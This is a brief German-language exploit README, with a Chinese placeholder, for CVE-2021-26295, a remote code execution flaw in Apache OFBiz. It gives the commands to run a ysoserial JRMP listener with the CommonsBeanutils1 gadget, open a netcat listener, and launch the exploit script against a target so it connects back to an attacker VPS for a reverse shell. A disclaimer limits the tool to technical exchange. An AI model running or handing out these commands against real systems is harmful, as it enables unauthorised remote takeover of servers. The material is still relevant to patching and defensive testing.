
Exploit für CVE-2021-26295 (Apache OFBiz RCE) unter Verwendung eines ysoserial-JRMP-Listeners, um Befehle auszuführen und eine Reverse-Shell auf anfälligen Zielen zu erhalten.
CVE-2021-26295 EXP kann erfolgreich eine Reverse Shell ausführen
Dieser Artikel und die Tools dienen ausschließlich dem technischen Austausch und sind nicht für illegale Zwecke bestimmt. Für alle daraus resultierenden Konsequenzen wird keine Haftung übernommen.
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[要执行的命令]'
nc -lvp 64444
python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>

